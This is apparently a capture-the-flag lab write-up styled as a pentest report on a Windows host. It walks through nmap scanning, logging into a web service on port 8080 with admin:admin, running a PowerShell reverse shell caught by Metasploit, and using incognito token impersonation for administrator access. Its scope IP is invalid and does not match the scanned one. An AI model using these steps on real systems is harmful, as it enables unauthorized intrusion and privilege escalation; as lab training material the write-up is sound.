Phases of penetration testing activities include the following:
Planning – Customer goals are gathered and rules of engagement obtained.
Discovery – Perform scanning and enumeration to identify potential vulnerabilities, weak areas, and exploits.
Attack – Confirm potential vulnerabilities through exploitation and perform additional discovery upon new access.
Reporting – Document all found vulnerabilities and exploits, failed attempts, and company strengths and weaknesses.
scope
| assessment | Details |
|---|---|
| Internal & external Penetration Test | 10.10.266.244 |
Vulnerability Summary
| Finding | Severity |
|---|---|
| weak password | High |
| RCE | High |
| token impersonation | High |
starting the pentesting engagement with Nmap
sudo nmap -A -T4 --open -vv 10.10.226.224 -oN nmap -Pn
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
3389/tcp open tcpwrapped syn-ack ttl 127
| ssl-cert: Subject: commonName=alfred
| Issuer: commonName=alfred
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-08-11T16:26:23
| Not valid after: 2023-02-10T16:26:23
| MD5: 3038 e053 8bfa 8e35 d8d8 ae42 4a7b c5fc
| SHA-1: c0e0 bea1 b805 d325 2efa 1e3f aa32 23eb 986f 7f57
| -----BEGIN CERTIFICATE-----
| MIIC0DCCAbigAwIBAgIQF06qDRJBJ41Cqf7rqpG8kDANBgkqhkiG9w0BAQUFADAR
| MQ8wDQYDVQQDEwZhbGZyZWQwHhcNMjIwODExMTYyNjIzWhcNMjMwMjEwMTYyNjIz
| WjARMQ8wDQYDVQQDEwZhbGZyZWQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
| AoIBAQDdxRnRn3a5UAn/E89zRhYTH1GyokrqQCp6NgpYYgaa6Y1YCcZnrLGLDEJw
| eXhYOgT1Q/O33soDyDeH9f+Jcp3awG0cG4YGnVh2FEiRwNnwYIVkqJVI0SqtuLYH
| /BKZwU+6LT24xJ8BtFSaORzeQBc3gyfwWkx2RUlGx27VPxqEoLrVKYraw6hyqCE3
| WIJUlMKE7OFpEYPvl1+dRJsCCQki6ZqJrb1uqVNljeFEDc+kZo5kWqd0gnO8jt1I
| dA41BMe4EtIAKmYZGG8IulAotWDhTdXOfSarhoHPVvWTPTXD5uTo0RAcN6sterGO
| WvheMnEL9fm4yGdLUfv8U25U81HvAgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUF
| BwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQUFAAOCAQEAjjJfpfDBizHwIIDh
| NzHqn1Dz44bnuCkuxdfZ+u3WrqQ0XuflgTMhgbqN8OZZPuXzZHQNdbnYieQimXVw
| kRAR/JbqTC+8s+cYBRytpu/ZSO1f61yz2fiySSxjr/bkrQY/SVr7fpR57BQl6bh9
| Y+lx4ms3p45YcQnuOIPKvIvPw60potiGHWmnT17XWcrA44TFdgB0NITnx7xVNRk2
| AaA/GyIjsbkt/s9fs3kqN8OK3HhkdC3FxPZzRpkW6AsxBwTc5CgeQg7if4CafRSA
| j+G8IXwBpRY5SyTz6YJeSKxEjrF1I9u9RtnnGxOHujkexmOf73s6RTRVP/4ENUT4
| NS4Czg==
|_-----END CERTIFICATE-----
|_ssl-date: 2022-08-12T16:34:20+00:00; 0s from scanner time.
8080/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Found 3 port open
let's start with port 80 → HTTP
we found nothing interesting
Port 8080 → HTTP
Try Credential admin:admin, and we get in
let's look around for something interesting
we can see that there is away we can execute command
ok first let's set up a listener with Metasploit
now copy the PowerShell command in the command executor
we got a reverse shell - sessions to view the sessions
Sessions -i → To interact with the session
Let's use token impersonation to gain system access.
- Load incognito
- list_tokens -g
- Impersonate_token "BUILTIN\Administrators"
If You cannot find the flag in the default place or there is no hint of the location of the flag, you can use search command to search the system for the file
